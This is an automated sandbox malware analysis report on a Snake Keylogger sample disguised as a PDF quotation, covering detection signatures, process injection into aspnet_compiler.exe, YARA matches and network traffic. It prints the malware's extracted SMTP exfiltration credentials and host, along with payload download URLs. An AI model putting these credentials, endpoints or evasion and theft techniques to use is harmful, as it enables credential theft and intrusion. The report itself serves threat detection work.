Edit tour

Windows Analysis Report
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Overview

General Information

Sample name:	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe renamed because original name is a hash value
Original sample name:	QUOTATION_OCTQTRA071244PDF.scr.exe
Analysis ID:	1543806
MD5:	5ab07a2800291bd5cabc6ccaef82e20b
SHA1:	ba5c41ee66a9e9be480db7f828ba6a63fcc50bc6
SHA256:	6c403516d322330a43a884229831078dfcadf76a81e77061f14b5de698efa071
Tags:	exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Creates a thread in another existing process (thread injection)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe (PID: 3244 cmdline: "C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe" MD5: 5AB07A2800291BD5CABC6CCAEF82E20B)

aspnet_compiler.exe (PID: 6012 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)

conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD6EwDq*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x143bb:$a1: get_encryptedPassword 0x1469f:$a2: get_encryptedUsername 0x141c7:$a3: get_timePasswordChanged 0x142c2:$a4: get_passwordField 0x143d1:$a5: set_encryptedPassword 0x159db:$a7: get_logins 0x1593e:$a10: KeyLoggerEventArgs 0x155d7:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bca1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1aed3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b306:$a4: \Orbitum\User Data\Default\Login Data 0x1c345:$a5: \Kometa\User Data\Default\Login Data
00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14f59:$s1: UnHook 0x14f60:$s2: SetHook 0x14f68:$s3: CallNextHook 0x14f75:$s4: _hook
00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c78:$x1: $%SMTPDV$ 0x17cde:$x2: $#TheHashHere%& 0x192bb:$x3: %FTPDV$ 0x193a5:$x4: $%TelegramDv$ 0x155d7:$x5: KeyLoggerEventArgs 0x1593e:$x5: KeyLoggerEventArgs 0x192df:$m2: Clipboard Logs ID 0x194f5:$m2: Screenshot Logs ID 0x19605:$m2: keystroke Logs ID 0x198df:$m3: SnakePW 0x194cd:$m4: \SnakeKeylogger\
00000000.00000002.2328766008.000002C7B801D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x46a18:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x49f4e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.2950884480.000002C61AF69000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.2949416019.000002C619020000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x24a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2335523965.000002C7C0000000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2316760953.000002C7A79E2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2660:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x5b96:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b4a3:$a1: get_encryptedPassword 0x1b787:$a2: get_encryptedUsername 0x1b2af:$a3: get_timePasswordChanged 0x1b3aa:$a4: get_passwordField 0x1b4b9:$a5: set_encryptedPassword 0x1cac3:$a7: get_logins 0x1ca26:$a10: KeyLoggerEventArgs 0x1c6bf:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1ed60:$x1: $%SMTPDV$ 0x1edc6:$x2: $#TheHashHere%& 0x203a3:$x3: %FTPDV$ 0x2048d:$x4: $%TelegramDv$ 0x1c6bf:$x5: KeyLoggerEventArgs 0x1ca26:$x5: KeyLoggerEventArgs 0x203c7:$m2: Clipboard Logs ID 0x205dd:$m2: Screenshot Logs ID 0x206ed:$m2: keystroke Logs ID 0x209c7:$m3: SnakePW 0x205b5:$m4: \SnakeKeylogger\
00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2316760953.000002C7A779B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2950884480.000002C61AD21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe PID: 3244	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6012	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6012	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x16de0:$a1: get_encryptedPassword 0x3d946:$a1: get_encryptedPassword 0x170ba:$a2: get_encryptedUsername 0x3dc20:$a2: get_encryptedUsername 0x16bf6:$a3: get_timePasswordChanged 0x3d75c:$a3: get_timePasswordChanged 0x16cf1:$a4: get_passwordField 0x3d857:$a4: get_passwordField 0x16df6:$a5: set_encryptedPassword 0x3d95c:$a5: set_encryptedPassword 0x191e8:$a7: get_logins 0x3fd4e:$a7: get_logins 0x1914b:$a10: KeyLoggerEventArgs 0x3fcb1:$a10: KeyLoggerEventArgs 0x18de4:$a11: KeyLoggerEventArgsEventHandler 0x3f94a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aspnet_compiler.exe PID: 6012	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18de4:$x5: KeyLoggerEventArgs 0x1914b:$x5: KeyLoggerEventArgs 0x1978b:$x5: KeyLoggerEventArgs 0x19abf:$x5: KeyLoggerEventArgs 0x3f94a:$x5: KeyLoggerEventArgs 0x3fcb1:$x5: KeyLoggerEventArgs 0x402f1:$x5: KeyLoggerEventArgs 0x40625:$x5: KeyLoggerEventArgs 0x1b311:$m2: Clipboard Logs ID 0x1b403:$m2: Screenshot Logs ID 0x1b459:$m2: keystroke Logs ID 0x41e77:$m2: Clipboard Logs ID 0x41f69:$m2: Screenshot Logs ID 0x41fbf:$m2: keystroke Logs ID 0x1b58e:$m3: SnakePW 0x420f4:$m3: SnakePW 0x1b3ef:$m4: \SnakeKeylogger\ 0x41f55:$m4: \SnakeKeylogger\
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7c0000000.13.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.aspnet_compiler.exe.2c61ab20000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.2c61ab20000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x125bb:$a1: get_encryptedPassword 0x1289f:$a2: get_encryptedUsername 0x123c7:$a3: get_timePasswordChanged 0x124c2:$a4: get_passwordField 0x125d1:$a5: set_encryptedPassword 0x13bdb:$a7: get_logins 0x13b3e:$a10: KeyLoggerEventArgs 0x137d7:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.2c61ab20000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19ea1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x190d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19506:$a4: \Orbitum\User Data\Default\Login Data 0x1a545:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.2c61ab20000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13159:$s1: UnHook 0x13160:$s2: SetHook 0x13168:$s3: CallNextHook 0x13175:$s4: _hook
4.2.aspnet_compiler.exe.2c61ab20000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15e78:$x1: $%SMTPDV$ 0x15ede:$x2: $#TheHashHere%& 0x174bb:$x3: %FTPDV$ 0x175a5:$x4: $%TelegramDv$ 0x137d7:$x5: KeyLoggerEventArgs 0x13b3e:$x5: KeyLoggerEventArgs 0x174df:$m2: Clipboard Logs ID 0x176f5:$m2: Screenshot Logs ID 0x17805:$m2: keystroke Logs ID 0x17adf:$m3: SnakePW 0x176cd:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x143bb:$a1: get_encryptedPassword 0x1469f:$a2: get_encryptedUsername 0x141c7:$a3: get_timePasswordChanged 0x142c2:$a4: get_passwordField 0x143d1:$a5: set_encryptedPassword 0x159db:$a7: get_logins 0x1593e:$a10: KeyLoggerEventArgs 0x155d7:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bca1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1aed3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b306:$a4: \Orbitum\User Data\Default\Login Data 0x1c345:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14f59:$s1: UnHook 0x14f60:$s2: SetHook 0x14f68:$s3: CallNextHook 0x14f75:$s4: _hook
4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c78:$x1: $%SMTPDV$ 0x17cde:$x2: $#TheHashHere%& 0x192bb:$x3: %FTPDV$ 0x193a5:$x4: $%TelegramDv$ 0x155d7:$x5: KeyLoggerEventArgs 0x1593e:$x5: KeyLoggerEventArgs 0x192df:$m2: Clipboard Logs ID 0x194f5:$m2: Screenshot Logs ID 0x19605:$m2: keystroke Logs ID 0x198df:$m3: SnakePW 0x194cd:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x125bb:$a1: get_encryptedPassword 0x1289f:$a2: get_encryptedUsername 0x123c7:$a3: get_timePasswordChanged 0x124c2:$a4: get_passwordField 0x125d1:$a5: set_encryptedPassword 0x13bdb:$a7: get_logins 0x13b3e:$a10: KeyLoggerEventArgs 0x137d7:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19ea1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x190d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19506:$a4: \Orbitum\User Data\Default\Login Data 0x1a545:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13159:$s1: UnHook 0x13160:$s2: SetHook 0x13168:$s3: CallNextHook 0x13175:$s4: _hook
4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15e78:$x1: $%SMTPDV$ 0x15ede:$x2: $#TheHashHere%& 0x174bb:$x3: %FTPDV$ 0x175a5:$x4: $%TelegramDv$ 0x137d7:$x5: KeyLoggerEventArgs 0x13b3e:$x5: KeyLoggerEventArgs 0x174df:$m2: Clipboard Logs ID 0x176f5:$m2: Screenshot Logs ID 0x17805:$m2: keystroke Logs ID 0x17adf:$m3: SnakePW 0x176cd:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x143bb:$a1: get_encryptedPassword 0x1469f:$a2: get_encryptedUsername 0x141c7:$a3: get_timePasswordChanged 0x142c2:$a4: get_passwordField 0x143d1:$a5: set_encryptedPassword 0x159db:$a7: get_logins 0x1593e:$a10: KeyLoggerEventArgs 0x155d7:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bca1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1aed3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b306:$a4: \Orbitum\User Data\Default\Login Data 0x1c345:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14f59:$s1: UnHook 0x14f60:$s2: SetHook 0x14f68:$s3: CallNextHook 0x14f75:$s4: _hook
4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c78:$x1: $%SMTPDV$ 0x17cde:$x2: $#TheHashHere%& 0x192bb:$x3: %FTPDV$ 0x193a5:$x4: $%TelegramDv$ 0x155d7:$x5: KeyLoggerEventArgs 0x1593e:$x5: KeyLoggerEventArgs 0x192df:$m2: Clipboard Logs ID 0x194f5:$m2: Screenshot Logs ID 0x19605:$m2: keystroke Logs ID 0x198df:$m3: SnakePW 0x194cd:$m4: \SnakeKeylogger\
0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b7cddb88.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, ParentProcessId: 3244, ParentProcessName: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 6012, ProcessName: aspnet_compiler.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T13:48:05.318496+0100	2803305	3	Unknown Traffic	192.168.2.4	49787	188.114.96.3	443	TCP
2024-10-28T13:48:11.056286+0100	2803305	3	Unknown Traffic	192.168.2.4	49826	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-28T13:48:03.555388+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49773	158.101.44.242	80	TCP
2024-10-28T13:48:04.602257+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49773	158.101.44.242	80	TCP
2024-10-28T13:48:06.039922+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49789	158.101.44.242	80	TCP
2024-10-28T13:48:07.492877+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49801	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD6EwDq*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49778 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7F2E000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7FA6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2336208720.000002C7C02D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7F2E000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7FA6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2336208720.000002C7C02D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Code function: 4x nop then jmp 00007FFD9BA1A02Ch	0_2_00007FFD9BA19CF2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD9B8AA235h	4_2_00007FFD9B8A9E4D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD9B8A9C1Bh	4_2_00007FFD9B8A99A3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD9B8A7470h	4_2_00007FFD9B8A7419
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FFD9B8AA235h	4_2_00007FFD9B8AA151

Source: global traffic	HTTP traffic detected: GET /data-package/jI82Ms6K/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/gxyOEP84bSEs HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/jI82Ms6K/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49789 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49773 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49801 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49787 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49826 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
